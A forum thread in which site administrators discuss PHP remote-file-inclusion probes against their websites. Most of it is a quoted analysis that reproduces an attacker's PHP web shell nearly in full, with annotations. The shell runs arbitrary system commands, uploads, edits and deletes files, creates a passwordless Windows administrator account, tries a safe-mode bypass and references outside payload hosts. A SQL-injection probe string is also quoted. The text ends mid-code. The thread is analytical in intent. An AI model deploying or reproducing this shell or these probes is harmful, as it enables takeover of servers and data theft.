Weird injection attempts



  • So...We noticed that some script kiddy (or zombie computers) was attempting to pull off some URL-parameter injection on some of our websites.  Most often, they tried to change one of the URL parameters to a URL (i.e. http://www.example.com/?var=http://www.1337h4x0r/script.php).  When I went to the URL being passed in, I found some PHP code:

     

    <?php echo md5("just_a_test")>
     
    Besides the fact that none of our pages are running on PHP, how in the hell is this supposed to work?  
    Are there pages out there that accept a URL as an argument and then arbitrarily execute whatever code is on that page?  Is this some crazy bug in an older version of PHP?

     



  • It's not a bug, it's a feature! (The "mapping URI parameters to global variables" kind of feature)

    PHP has, since a few versions, a framework for handling URI schemes. If any function that expects a local file path as an argument instead receives a string that looks like an URI, it will "automagically" attempt to call up the appropriate scheme handler and let it do the work of retrieving the file. So fopen("/file") would open "file" on the local drive, but fopen("http://example.com/file") would try to download it from example.com, completely transparent to your script.

    In PHP's usual foresight and ingenuity, they expanded this mechanism to fancier functions as well - like include(). Combine that with a call to, let's say [code]include($_GET["module"] . "/init.php");[/code] in Joe Braindead's PHP script and you got your function on the silver table.



  • I expect they're probing for XSS holes. If they find a way to inject html goop into your pages, the real attack would contain a chunk of javascript instead.



  • @PSWorx said:

    It's not a bug, it's a feature! (The "mapping URI parameters to global variables" kind of feature)

    PHP has, since a few versions, a framework for handling URI schemes. If any function that expects a local file path as an argument instead receives a string that looks like an URI, it will "automagically" attempt to call up the appropriate scheme handler and let it do the work of retrieving the file. So fopen("/file") would open "file" on the local drive, but fopen("http://example.com/file") would try to download it from example.com, completely transparent to your script.

    In PHP's usual foresight and ingenuity, they expanded this mechanism to fancier functions as well - like include(). Combine that with a call to, let's say [code]include($_GET["module"] . "/init.php");[/code] in Joe Braindead's PHP script and you got your function on the silver table.

     

    Ah, that makes sense.  Still, you'd have to be pretty damn stupid to write code that gets filenames from URL parameters...yikes!



  • @bighusker said:

    @PSWorx said:

    It's not a bug, it's a feature! (The "mapping URI parameters to global variables" kind of feature)

    PHP has, since a few versions, a framework for handling URI schemes. If any function that expects a local file path as an argument instead receives a string that looks like an URI, it will "automagically" attempt to call up the appropriate scheme handler and let it do the work of retrieving the file. So fopen("/file") would open "file" on the local drive, but fopen("http://example.com/file") would try to download it from example.com, completely transparent to your script.

    In PHP's usual foresight and ingenuity, they expanded this mechanism to fancier functions as well - like include(). Combine that with a call to, let's say [code]include($_GET["module"] . "/init.php");[/code] in Joe Braindead's PHP script and you got your function on the silver table.

     

    Ah, that makes sense.  Still, you'd have to be pretty damn stupid to write code that gets filenames from URL parameters...yikes!

     

    I see you're new to this site. 



  • I've been getting the same thing   It happens 5 times day withing 5 minutes always around 10am.  we're getting two things happening. 

     <FONT size=2>http://www.company.com/pcc/index.aspx?lnkID=http://www.sectoranime.com.mx/galeria/include/nokuc/kef/&imgID=PCC_conferences.jpg</FONT><FONT size=2> threw an error message.  </FONT>

    <FONT size=2>and </FONT>

    <FONT size=2>your usual sql injection attempts.</FONT>

    <FONT size=2>

    </FONT><FONT color=#0000ff size=2>http://www.masspartnership.com/about/index.aspx?imgid=newsandevents.jpg&lnkid=newsandevents.ascx</FONT><FONT size=2>' and user>0 and ''=' threw an error message.</FONT>

    <FONT size=2></FONT> 

    <FONT size=2> going to the url's shown always shows the same bit of php code. <?php echo md5("just_a_test")></FONT>

    <FONT size=2>I've got a lit of 10 sites.  that they try to pass.</FONT>

    <FONT size=2> 

    </FONT>


  • found this on the web 
     
    	 Guest : 162.39.119.102 : July 12, 2007, 05:40:08 AM
    /forums/index.php?board=15;action=display;threadid=2286/Sources/Packages.php?sourcedir=http://members.lycos.co.uk/kalafi0r/asd.txt???

    kalafi0r seems to be some Polish script kiddy. On the move:
    http://security.pigstye.net/staticpages/index.php/index

    $ nslookup 162.39.119.102
    Server: 216.201.118.101
    Address: 216.201.118.101#53

    Non-authoritative answer:
    102.119.39.162.in-addr.arpa name = h102.119.39.162.ip.alltel.net.

    TRACE:
    traceroute to h102.119.39.162.ip.alltel.net (162.39.119.102), 30 hops max, 38 byte packets
    ...
    6 tbr2.attga.ip.att.net (12.122.10.137) 59.477 ms 55.821 ms 55.611 ms
    MPLS Label=31746 CoS=3 TTL=1 S=0
    7 gar5.attga.ip.att.net (12.123.20.181) 54.272 ms 54.308 ms 55.562 ms
    8 12.118.120.118 (12.118.120.118) 54.081 ms 58.049 ms 85.980 ms
    9 h121.21.213.151.ip.alltel.net (151.213.21.121) 63.574 ms 64.787 ms 64.962 ms
    10 h54.33.213.151.ip.alltel.net (151.213.33.54) 62.919 ms h58.33.213.151.ip.alltel.net (151.213.33.58) 65.127 ms 64.626 ms
    11 h123.21.213.151.ip.alltel.net (151.213.21.123) 70.105 ms h107.21.213.151.ip.alltel.net (151.213.21.107) 108.281 ms h123.21.213.151.ip.alltel.net (151.213.21.123) 68.374 ms
    12 mthwnc-7200-2.alltel.net (166.102.102.232) 68.345 ms 68.061 ms 68.389 ms
    13 h97.119.39.162.ip.alltel.net (162.39.119.97) 74.313 ms 74.527 ms 77.739 ms
    14 h102.119.39.162.ip.alltel.net (162.39.119.102) 79.976 ms 77.663 ms 76.522

    Matthews, North Carolina? Not many poles there, probably a bot-infected win box
    http://www.google.com/maps?q=Matthews,+NC,+USA&output=html

    This topic doesn't exist on this board. - "2286/Sources/Packages.php?sourcedir=http://members.lycos.co.uk/kalafi0r/asd.txt???"

    Our attacker is trying to get our server to include some extra unvalidated PHP code. The Lycos page has the following source:

    =~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~ malcode ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=

    <html>
    <head>
    <meta http-equiv="Content-Language" content="pt-br">

    <!-- FRONTAPAGE, HUH. SOMEONE HAS A SENSE OF HUMOR :) //-->

    <meta name="GENERATOR" content="Microsoft FrontPage 5.0">
    <meta name="ProgId" content="AoD">
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">

    <!-- BY POLSKI SCRIPT KIDD, WHO CAN CUT N PASTE REALLY LEET //-->

    <title>By destructive > irc.gigachat.net > CMD > File List</title>
    <style type="text/css">
    A:link {text-decoration:none}
    A:visited {text-decoration:none}
    A:hover {text-decoration:underline}
    A:active {text-decoration:underline}
    </style>
    </head>
    <body style="font-family: Tahoma; font-size: 10px">
    <?php

    @set_time_limit(0);

    $string = $_SERVER['QUERY_STRING'];

    $mhost = 'http://www.avto.bz/lang/.../cmd.txt?';

    // NOT SURE WHAT WE'RE EXPLODING HERE, AVTO.BZ DOESN'T RESOLVE
    // ALTHOUGH, THE GOOGLE CACHE SHOWS ITS GHOST:
    // http://64.233.169.104/search?q=cache:J3mih5icxVEJ:www.avto.bz/links.php+"avto.bz"&hl=en&ct=clnk&cd=7&gl=us

    $host_all = explode("$mhost", $string);
    $s1 = $host_all[0];

    // $_SERVER['PHP_SELF'] is filename of the currently executing script
    // $fstring WILL BE THE SHORTHAND FOR THE XSS CALL TO OUR SERVER, TO GET IT TO EXECUTE
    // ALL OF THE PROGS, FUNCTIONS, ETC

    $fstring = $_SERVER['PHP_SELF']."?".$s1.$mhost;

    $OS = @PHP_OS;
    $IpServer = '127.0.0.1';
    $UNAME = @php_uname();
    $PHPv = @phpversion();
    $SafeMode = @ini_get('safe_mode');

    if ($SafeMode == '') { $SafeMode = "<i>OFF</i>"; }
    else { $SafeMode = "<i>$SafeMode</i>"; }

    // BELOW SOURCES ONLY LOAD SRC FROM http://www.home-equity-loans-1.org/l.php
    // CHANGED? ABANDONED?

    $btname = 'backtool.txt';
    $bt = 'http://www.full-comandos.com/jobing/r0nin';
    $dc = 'http://www.full-comandos.com/jobing/dc.txt';

    // LOOKS LIKE WE'RE MAKING WINDOWS ADMIN ACCOUNTS
    // LOOK FOR WEBBOT'S INVOCATION OF "$cmd=$newuser"

    $newuser = '@echo off;net user Admin /add /expires:never /passwordreq:no;net localgroup &quot;Administrators&quot; /add Admin;net localgroup &quot;Users&quot; /del Admin';

    // HERE'S SOME JS FILE WRANGLING FUNCTIONS (CHMOD, COPY, CD, RENAME, MKDIR)

    // Java Script
    echo "<script type="text/javascript">";
    echo "function ChMod(chdir, file) {";
    echo "var o = prompt('Chmod: - Exemple: 0777', '');";
    echo "if (o) {";
    echo "window.location="" + '{$fstring}&action=chmod&chdir=' + chdir + '&file=' + file + '&chmod=' + o + "";";
    echo "}";
    echo "}";
    echo "function Rename(chdir, file, mode) {";
    echo "if (mode == 'edit') {";
    echo "var o = prompt('Rename file '+ file + ' for:', '');";
    echo "}";
    echo "else {";
    echo "var o = prompt('Rename dir '+ file + ' for:', '');";
    echo "}";
    echo "if (o) {";
    echo "window.location="" + '{$fstring}&action=rename&chdir=' + chdir + '&file=' + file + '&newname=' + o + '&mode=' + mode +"";";
    echo "}";
    echo "}";
    echo "function Copy(chdir, file) {";
    echo "var o = prompt('Copied for:', '/tmp/' + file);";
    echo "if (o) {";
    echo "window.location="" + '{$fstring}&action=copy&chdir=' + chdir + '&file=' + file + '&fcopy=' + o + "";";
    echo "}";
    echo "}";
    echo "function Mkdir(chdir) {";
    echo "var o = prompt('Which name?', 'NewDir');";
    echo "if (o) {";
    echo "window.location="" + '{$fstring}&action=mkdir&chdir=' + chdir + '&newdir=' + o + "";";
    echo "}";
    echo "}";
    echo "function Newfile(chdir) {";
    echo "var o = prompt('Which name?', 'NewFile.txt');";
    echo "if (o) {";
    echo "window.location="" + '{$fstring}&action=newfile&chdir=' + chdir + '&newfile=' + o + "";";
    echo "}";
    echo "}";
    echo "</script>";

    // End JavaScript

    /* Functions */
    function cmd($CMDs) {
    	$CMD[1] = '';
    	exec($CMDs, $CMD[1]);
    	if (empty($CMD[1])) {
    		$CMD[1] = shell_exec($CMDs);
    	}
    		elseif (empty($CMD[1])) {
    		$CMD[1] = passthru($CMDs);
    	}
    	elseif (empty($CMD[1])) {
    		$CMD[1] = system($CMDs);
    	}
    	elseif (empty($CMD[1])) {
    		$handle = popen($CMDs, 'r');
    		while(!feof($handle)) {
    			$CMD[1][] .= fgets($handle);
    		}
    		pclose($handle);
    	}
    	return $CMD[1];
    }
    

    if (@$_GET['chdir']) {
    $chdir = $_GET['chdir'];
    } else {
    $chdir = getcwd()."/";
    }
    if (@chdir("$chdir")) {
    $msg = "<font color="#008000">Entrance&nbsp;in&nbsp;the&nbsp;directory,&nbsp;OK!</font>";
    } else {
    $msg = "<font color="#FF0000">Error&nbsp;to&nbsp;enters&nbsp;it&nbsp;in&nbsp;the&nbsp;directory!</font>";
    $chdir = str_replace($SCRIPT_NAME, "", $_SERVER['SCRIPT_NAME']);
    }

    // REPLACE BACKSLASH WITH FWD SLASH, YEP ITS FOR WINDOWS ALLRIGHT

    $chdir = str_replace(chr(92), chr(47), $chdir);

    // CMD==UPLOAD: DENOTE SUCCESS IF WE UPLOAD OUR BOT CODE SUCCESSFULLY

    if (@$_GET['action'] == 'upload') {
    $uploaddir = $chdir;

     //USING HTTP POST TO UPLOAD JUNK ($_FILES)
    

    $uploadfile = $uploaddir. $_FILES['userfile']['name'];
    if (@move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $_FILES['userfile']['name'])) {
    $msg = "<font color="#008000"><font color="#000080">{$_FILES['userfile']['name']}</font>,&nbsp;the&nbsp;archive&nbsp;is&nbsp;validates&nbsp;and&nbsp;was&nbsp;loaded&nbsp;successfully.</font>";
    } else {
    $msg = "<font color="#FF0000">Error&nbsp;when&nbsp;copying&nbsp;archive.</font>";
    }
    }

    //CMD==MKDIR: MAKE A NEW DIR

    elseif (@$_GET['action'] == 'mkdir') {
    $newdir = $_GET['newdir'];
    if (@mkdir("$chdir"."$newdir")) {
    $msg = "<font color="#008000"><font color="#000080">{$newdir}</font>,&nbsp;directory&nbsp;created successfully.</font>";
    } else {
    $msg = "<font color="#FF0000">Error&nbsp;to&nbsp;it&nbsp;creates&nbsp;directory.</font>";
    }
    }

    //CMD==NEWFILE: TOUCH OFF A FILE

    elseif (@$_GET['action'] == 'newfile') {
    $newfile = $_GET['newfile'];
    if (@touch("$chdir"."$newfile")) {
    $msg = "<font color="#008000"><font color="#000080">{$newfile}</font>,&nbsp;created successfully!</font>";
    } else {
    $msg = "<font color="#FF0000">Error&nbsp;to&nbsp;tries&nbsp;it&nbsp;creates&nbsp;archive.</font>";
    }
    }

    //CMD==DELETE:
    // FILES
    elseif (@$_GET['action'] == 'del') {
    $file = $_GET['file']; $type = $_GET['type'];
    if ($type == 'file') {
    if (@unlink("$chdir"."$file")) {
    $msg = "<font color="#008000"><font color="#000080">{$file}</font>,&nbsp;successfully&nbsp;excluded&nbsp;archive!</font>";
    } else {
    $msg = "<font color="#FF0000">Error&nbsp;to&nbsp;it&nbsp;I&nbsp;excluded&nbsp;archive!</font>";
    }
    // DIRS
    } elseif ($type == 'dir') {
    if (@rmdir("$chdir"."$file")) {
    $msg = "<font color="#008000"><font color="#000080">{$file}</font>,&nbsp;successfully&nbsp;excluded&nbsp;directory!</font>";
    } else {
    $msg = "<font color="#FF0000">Error&nbsp;to&nbsp;it&nbsp;I&nbsp;excluded&nbsp;directory!</font>";
    }
    }
    }

    // CMD==CHMOD: 777 SOME FILES

    elseif (@$_GET['action'] == 'chmod') {
    $file = $chdir.$_GET['file']; $chmod = $_GET['chmod'];
    if (@chmod ("$file", $chmod)) {

      $msg = "&lt;font color=\"#008000\"&gt;Chmod&amp;nbsp;of&lt;/font&gt;&amp;nbsp;&lt;font color=\"#000080\"&gt;{$_GET['file']}&lt;/font&gt;&amp;nbsp;&lt;font color=\"#008000\"&gt;moved&amp;nbsp;for&lt;/font&gt;&amp;nbsp;&lt;font color=\"#000080\"&gt;$chmod&lt;/font&gt;&amp;nbsp;&lt;font color=\"#008000\"&gt;successfully.&lt;/font&gt;";
     } else {
        $msg = '&lt;font color=\"#FF0000\"&gt;Error&amp;nbsp;when&amp;nbsp;moving&amp;nbsp;chmod.&lt;/font&gt;';
       }
    

    }

    //CMD==RENAME: RENAME

    elseif (@$_GET['action'] == 'rename') {
    $file = $_GET['file']; $newname = $_GET['newname'];
    if (@rename("$chdir"."$file", "$chdir"."$newname")) {
    $msg = "<font color="#008000">Archive</font>&nbsp;<font color="#000080">{$file}</font>&nbsp;<font color="#008000">named for</font>&nbsp;<font color="#000080">{$newname}</font>&nbsp;<font color="#008000">successfully!</font>";
    } else {
    $msg = "<font color="#FF0000">Error&nbsp;to&nbsp;it&nbsp;nominates&nbsp;archive.</font>";
    }
    }

    //CMD==COPY: DUPE SOME SHIT

    elseif (@$_GET['action'] == 'copy') {
    $file = $chdir.$_GET['file']; $copy = $_GET['fcopy'];
    if (@copy("$file", "$copy")) {
    $msg = "<font color="#000080">{$file}</font>,&nbsp;<font color="#008000">copied for</font> <font color="#000080">{$copy}</font> <font color="#008000">successfully!</font>";
    } else {
    $msg = "<font color="#FF0000">Error&nbsp;when&nbsp;copying</font>&nbsp;<font color="#000000">{$file}</font>&nbsp;<font color="#FF0000">for</font>&nbsp;<font color="#000000">{$copy}</font></font>";
    }
    }
    /* Parte Atualiza 02:48 12/2/2006 */

    //CMD==COMMAND: DO SOME SHIT

    elseif (@$_GET['action'] == 'cmd') {
    if (!empty($_GET['cmd'])) { $cmd = @$_GET['cmd']; }
    if (!empty($_POST['cmd'])) { $cmd = @$_POST['cmd']; }

    $cmd = stripslashes(trim($cmd));
    $result_arr = cmd($cmd);
    
    $afim = count($result_arr); $acom = 0; $msg = '';
    $msg .= "&lt;p style=\"color: #000000;text-align: center;font-family: 'Lucida Console';font-size: 12px;margin 2\"&gt;Results:&amp;nbsp;&lt;b&gt;".$cmd."&lt;/b&gt;&lt;/p&gt;";
    if ($result_arr) {
    	while ($acom &lt;= $afim) {
    		$msg .= "&lt;p style=\"color: #008000;text-align: left;font-family: 'Lucida Console';font-size: 12px;margin 2\"&gt;&amp;nbsp;".@$result_arr[$acom]."&lt;/p&gt;";
    	$acom++;
    	}
    }
    else {
    	$msg .= "&lt;p style=\"color: #FF0000;text-align: center;font-family: 'Lucida Console';font-size: 12px;margin 2\"&gt;Erro ao executar comando.&lt;/p&gt;";
    
     // ERRO AO EXECUTAR COMANDO??? PORTUGUESE HAX0R mebbe?
    
    }
    

    }
    elseif (@$_GET['action'] == 'safemode') {

    // CHECKING FOR/USING SHARED MEMORY OPS SO WE CAN
    // EXECUTE THE PHP SAFE MODE BYPASS:
    // http://securityvulns.com/files/safe_mode_bypass.php

    if (@!extension_loaded('shmop')) {
    echo "Loading... module</br>";

    if (strtoupper(substr(PHP_OS, 0,3) == 'WIN')) {
        @dl('php_shmop.dll');
    } else {
        @dl('shmop.so');
    }
    

    }

    if (@extension_loaded('shmop')) {
    echo "Module: <b>shmop</b> loaded!</br>";

    // PHP SAFE MODE BYPASS:

    $shm_id = @shmop_open(0xff2, "c", 0644, 100);
    if (!$shm_id) { echo "Couldn't create shared memory segment\n"; }
    $data="\x00";
    $offset=-3842685;
    $shm_bytes_written = @shmop_write($shm_id, $data, $offset);
    if ($shm_bytes_written != strlen($data)) { echo "Couldn't write the entire length of data\n"; }
    if (!shmop_delete($shm_id)) { echo "Couldn't mark shared memory block for deletion."; }
    echo passthru("id");
    shmop_close($shm_id);

    } else { echo "Module: <b>shmop</b> not loaded!</br>"; }
    }

    // CMD==ZIP FILES

    elseif (@$_GET['action'] == 'zipen') {
    $file = $_GET['file'];
    $zip = @zip_open("$chdir"."$file");
    $msg = '';
    if ($zip) {

    while ($zip_entry = zip_read($zip)) {
        $msg .= "Name:               " . zip_entry_name($zip_entry) . "\\n";
        $msg .= "Actual Filesize:    " . zip_entry_filesize($zip_entry) . "\\n";
        $msg .= "Compressed Size:    " . zip_entry_compressedsize($zip_entry) . "\\n";
        $msg .= "Compression Method: " . zip_entry_compressionmethod($zip_entry) . "\\n";
    
        if (zip_entry_open($zip, $zip_entry, "r")) {
            echo "File Contents:\\n";
            $buf = zip_entry_read($zip_entry, zip_entry_filesize($zip_entry));
            echo "$buf\\n";
    
            zip_entry_close($zip_entry);
        }
        echo "\\n";
    
    }
    
    zip_close($zip);
    

    }
    }

    //CMD==EDIT

    elseif (@$_GET['action'] == 'edit') {
    $file = $_GET['file'];
    $conteudo = '';
    $filename = "$chdir"."$file";

    // read file $filename into string $conteudo
    // Conteúdo?? That's Portuguese for "content" y'all - hmmm
    // Portuguese?? interesting.....

    $conteudo = @file_get_contents($filename);

    // Convert special characters to HTML entities

    $conteudo = htmlspecialchars($conteudo);

    //$_SERVER is an array containing information such as headers, paths, and script locations. IT IS PART OF THE register_globals SECURITY FIASCO (right? check my facts here, I'm not 100% on that).

    $back = $_SERVER['HTTP_REFERER'];
    echo "<p align="center">Editing&nbsp;{$file}&nbsp;...</p>";
    echo "<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="editacao">";
    echo "<tr>";
    echo "<td width="100%">";
    echo "<form method="POST" action="{$fstring}&amp;action=save&amp;chdir={$chdir}&amp;file={$file}">";

    // NOTICE THE REFERENCE TO "webbot" AND ITS LOGFILE: _private/form_results.csv

    echo "<!--webbot bot="SaveResults" u-file="_private/form_results.csv" s-format="TEXT/CSV" s-label-fields="TRUE" --><p align="center">";
    print "<textarea rows="18" name="S1" cols="89" style="font-family: Verdana; font-size: 10pt; border: 1px solid #000000">{$conteudo}</textarea></p>";
    echo "<p align="center">";
    echo "<input type="submit" value="Save" name="B2" style="font-family: Tahoma; font-size: 10px; border: 1px solid #000000">&nbsp;";
    echo "<input type="button" value="Closes Publisher" Onclick="javascript:window.location='{$fstring}&amp;chdir={$chdir}'" name="B1" style="font-family: Tahoma; font-size: 10px; border: 1px solid #000000">&nbsp;";
    echo "</form>";
    echo "</td>";
    echo "</tr>";
    echo "</table>";
    }

    //CMD==SAVE

    elseif (@$_GET['action'] == 'save') {
    $filename = "$chdir".$_GET['file'];
    $somecontent = $_POST['S1'];
    $somecontent = stripslashes(trim($somecontent));
    if (is_writable($filename)) {
    @$handle = fopen ($filename, "w");
    @$fw = fwrite($handle, $somecontent);
    @fclose($handle);
    if ($handle && $fw) {
    $msg = "<font color="#000080">{$_GET['file']}</font>,&nbsp;<font color="#008000">edited&nbsp;successfully!</font>";
    }
    } else {
    $msg = "<font color="#000000">{$_GET['file']},</font>&nbsp;<font color="#FF0000">cannot&nbsp;be&nbsp;written!</font>";
    }
    }

    // INVENTORY TIME!!

    // Informa&#65533;&#65533;es
    $cmdget = '';
    if (!empty($_GET['cmd'])) { $cmdget = @$_GET['cmd']; }
    if (!empty($_POST['cmd'])) { $cmdget = @$_POST['cmd']; }
    $cmdget = htmlspecialchars($cmdget);
    function asdads() {
    $asdads = '';

    // LESSEE WHAT KEWL TOOLS ARE PRELOADED FOR US....

    if (@file_exists("/usr/bin/wget")) { $asdads .= "wget&nbsp;"; }
    if (@file_exists("/usr/bin/fetch")) { $asdads .= "fetch&nbsp;"; }
    if (@file_exists("/usr/bin/curl")) { $asdads .= "curl&nbsp;"; }
    if (@file_exists("/usr/bin/GET")) { $asdads .= "GET&nbsp;"; }
    if (@file_exists("/usr/bin/lynx")) { $asdads .= "lynx&nbsp;"; }
    return $asdads;
    }

    //ID THE SYSTEM OS AND PHP VERSIONS

    echo "<form method="POST" name="cmd" action="{$fstring}&amp;action=cmd&amp;chdir=$chdir">";
    echo "<fieldset style="border: 1px solid #000000; padding: 2">";
    echo "<legend>Informa&#65533;&#65533;es</legend>";
    echo "<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse; font-family: Tahoma; font-size: 10px" width="100%">";
    echo "<tr>";
    echo "<td width="8%">";
    echo "<p align="right"><b>Sistema:</b>&nbsp;</td></p>";
    echo "<td width="92%">&nbsp;{$OS}</td>";
    echo "</tr>";
    echo "<tr>";
    echo "<td width="8%">";
    echo "<p align="right"><b>Uname:&nbsp;</b></td></p>";
    echo "<td width="92%">&nbsp;{$UNAME}</td>";
    echo "</tr>";
    echo "<tr>";
    echo "<td width="8%">";
    echo "<p align="right"><b>PHP:&nbsp;</b></td></p>";
    echo "<td width="92%">&nbsp;{$PHPv},&nbsp;<b>safe mode:</b>&nbsp;{$SafeMode}</td>";
    echo "</tr>";
    if (strtoupper(substr($OS, 0,3) != 'WIN')) {
    $Methods = asdads();
    if ($Methods == '') { $Methods = "???"; }
    echo "<tr>";
    echo "<td width="8%">";
    echo "<p align="right"><b>Methods:&nbsp;</b></td></p>";
    echo "<td width="92%">&nbsp;{$Methods}</td>";
    echo "</tr>";
    }

    echo "<tr>";
    echo "<td width="8%">";
    echo "<p align="right"><b>Ip:&nbsp;</b></td></p>";
    echo "<td width="92%">&nbsp;{$IpServer}</td>";
    echo "</tr>";
    echo "<tr>";
    echo "<td width="8%">";
    echo "<p align="right"><b>Command:&nbsp;</b></td></p>";
    echo "<td width="92%">&nbsp;<input type="text" size="70" name="cmd" value="{$cmdget}" style="font-family: Tahoma; font-size: 10 px; border: 1px solid #000000">&nbsp;<input type="submit" name="action" value="Send" style="font-family: Tahoma; font-size: 10 px; border: 1px solid #000000"></td>";
    echo "</tr>";
    echo "</table>";
    echo "</fieldset></form>";
    // Dir

    echo "<form method="POST" action="{$fstring}&amp;action=upload&amp;chdir=$chdir" enctype="multipart/form-data">";

    //webbot upload, mkdir, (use cases, "action=blah")

    echo "<!--webbot bot="FileUpload" u-file="_private/form_results.csv" s-format="TEXT/CSV" s-label-fields="TRUE" --><fieldset style="border: 1px solid #000000; padding: 2">";
    if (is_writable("$chdir")) {
    if (strtoupper(substr($OS, 0,3) == 'WIN')) {
    echo "<legend>Dir&nbsp;<b>YES</b>:&nbsp;{$chdir}&nbsp;-&nbsp;<a href="#[New Dir]" onclick="Mkdir('{$chdir}');">[New Dir]</a>&nbsp;<a href="#[New File]" onclick="Newfile('{$chdir}')">[New File]</a>&nbsp;<a href="{$fstring}&amp;action=cmd&amp;chdir={$chdir}&amp;cmd=$newuser">[Remote Access]</a></legend>";
    } else {
    echo "<legend>Dir&nbsp;<b>YES</b>:&nbsp;{$chdir}&nbsp;-&nbsp;<a href="#[New Dir]" onclick="Mkdir('{$chdir}');">[New Dir]</a>&nbsp;<a href="#[New File]" onclick="Newfile('{$chdir}')">[New File]</a>&nbsp;<a href="{$fstring}&amp;action=backtool&amp;chdir={$chdir}&amp;write=yes">[BackTool]</a></legend>";
    }
    }
    else {
    if (strtoupper(substr($OS, 0,3) == 'WIN')) {
    echo "<legend>Dir&nbsp;NO:&nbsp;{$chdir}&nbsp;-&nbsp;<a href="#[New Dir]" onclick="Mkdir('{$chdir}');">[New Dir]</a>&nbsp;<a href="#[New File]" onclick="Newfile('{$chdir}')">[New File]</a>&nbsp;<a href="{$fstring}&amp;action=cmd&amp;chdir={$chdir}&amp;cmd={$newuser}">[Remote Access]</a></legend>";
    } else {
    echo "<legend>Dir&nbsp;NO:&nbsp;{$chdir}&nbsp;-&nbsp;<a href="#[New Dir]" onclick="Mkdir('{$chdir}');">[New Dir]</a>&nbsp;<a href="#[New File]" onclick="Newfile('{$chdir}')">[New File]</a>&nbsp;<a href="{$fstring}&amp;action=backtool&amp;chdir={$chdir}&amp;write=no">[BackTool]</a></legend>";
    }
    }

    if (@!$handle = opendir("$chdir")) {
    echo "&nbsp;I&nbsp;could&nbsp;not&nbsp;enters&nbsp;in&nbsp;the&nbsp;directory,&nbsp;<a href="{$fstring}">click here!</a>&nbsp;for&nbsp;return&nbsp;to&nbsp;the&nbsp;original&nbsp;directory!</br>";
    }
    else {
    echo " <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse; font-family: Tahoma; font-size: 10px" width="100%">";
    echo " <tr>";
    echo " <td width="100%" style="font-family: Tahoma; font-size: 10px" colspan="4">&nbsp;Upload:";
    echo " <input type="file" name="userfile" size="91" style="font-family: Tahoma; font-size: 10px; border-style: solid; border-width: 1">";
    echo " <input type="submit" value="Send" name="B1" style="font-family: Tahoma; font-size: 10px; border: 1px solid #000000"></td>";
    echo " </tr>";
    echo " <tr>";
    echo " <td width="100%" style="font-family: Tahoma; font-size: 10px" colspan="4">&nbsp;</td>";
    echo " </tr>";
    echo " <tr>";
    echo " <td width="100%" style="font-family: Tahoma; font-size: 10px" colspan="4">";
    if (@!$msg) {
    echo " <p align="left">Messages</td>";
    } else {
    echo " <p align="left">$msg</td>";
    }
    echo " </tr>";
    echo " <tr>";
    echo " <td width="100%" colspan="4">&nbsp;</td>";
    echo " </tr>";
    echo " <tr>";
    echo " <td width="9%">&nbsp;Perms</td>";
    echo " <td width="49%">&nbsp;File </td>";
    echo " <td width="10%">&nbsp;Size </td>";
    echo " <td width="32%">&nbsp;Commands</td>";
    echo " </tr>";
    $colorn = 0;
    while (false !== ($file = readdir($handle))) {
    if ($file != '.') {
    if ($colorn == 0) {
    $color = "style="background-color: #FFCC66"";
    }
    elseif ($colorn == 1) {
    $color = "style="background-color: #C0C0C0"";
    }
    if (@is_dir("$chdir"."$file")) {
    $file = $file.'/';
    $mode = 'chdir';
    } else {
    $mode = 'edit';
    }
    if (@substr("$chdir", strlen($chdir) -1, 1) != '/') {
    $chdir .= '/';
    }
    if ($file == '../') {
    $lenpath = strlen($chdir); $baras = 0;
    for ($i = 0;$i < $lenpath;$i++) { if ($chdir{$i} == '/') { $baras++; } }
    $chdir_ = explode("/", $chdir);
    $chdirpox = str_replace($chdir_[$baras-1].'/', "", $chdir);
    }
    $perms = @fileperms ("$chdir"."$file");
    if ($perms == '') {
    $perms = '???';
    }
    $size = @filesize ("$chdir"."$file");
    $size = $size / 1024;
    $size = explode(".", $size);
    if (@$size[1] != '') {
    $size = $size[0].'.'.@substr("$size[1]", 0, 2);
    } else {
    $size = $size[0];
    }
    if ($size == 0) {
    if ($mode == 'chdir') {
    $size = '???';
    }
    }
    echo "<tr>";
    echo "<td width="9%" $color>&nbsp;$perms</td>";
    if (@is_writable ("$chdir"."$file")) {
    if ($mode == 'chdir') {
    if ($file == '../') {
    echo "<td width="49%" $color>&nbsp;<b><a href="{$fstring}&amp;chdir=$chdirpox">$file</a></b></td>";
    } else {
    echo "<td width="49%" $color>&nbsp;<b><a href="{$fstring}&amp;chdir={$chdir}{$file}">$file</a></b></td>";
    }
    } else {
    if (is_readable("$chdir"."$file")) {
    echo "<td width="49%" $color>&nbsp;<b><a href="{$fstring}&amp;action=edit&amp;chdir=$chdir&amp;file=$file">$file</a></b></td>";
    } else {
    echo "<td width="49%" $color>&nbsp;<b>$file</b></td>";
    }
    }
    }
    else {
    if ($mode == 'chdir') {
    if ($file == '../') {
    echo "<td width="49%" $color>&nbsp;<a href="{$fstring}&amp;chdir=$chdirpox">$file</a></td>";
    } else {
    echo "<td width="49%" $color>&nbsp;<a href="{$fstring}&amp;chdir={$chdir}{$file}">$file</a></td>";
    }
    } else {
    if (@is_readable("$chdir"."$file")) {
    echo "<td width="49%" $color>&nbsp;<a href="{$fstring}&amp;action=edit&amp;chdir=$chdir&amp;file=$file">$file</a></td>";
    } else {
    echo "<td width="49%" $color>&nbsp;$file</td>";
    }
    }
    }
    echo "<td width="10%" $color>&nbsp;$size&nbsp;KB</td>";
    if ($mode == 'edit') {
    echo "<td width="32%" $color>&nbsp;<a href="#{$file}" onclick="Rename('{$chdir}', '{$file}', '{$mode}')">[Rename]</a>&nbsp;<a href="{$fstring}&amp;action=del&amp;chdir={$chdir}&amp;file={$file}&amp;type=file">[Del]</a>&nbsp;<a href="#{$file}" onclick="ChMod('$chdir', '$file')">[Chmod]</a>&nbsp;<a href="#{$file}" onclick="Copy('{$chdir}', '{$file}')">[Copy]</a></td>";
    } else {
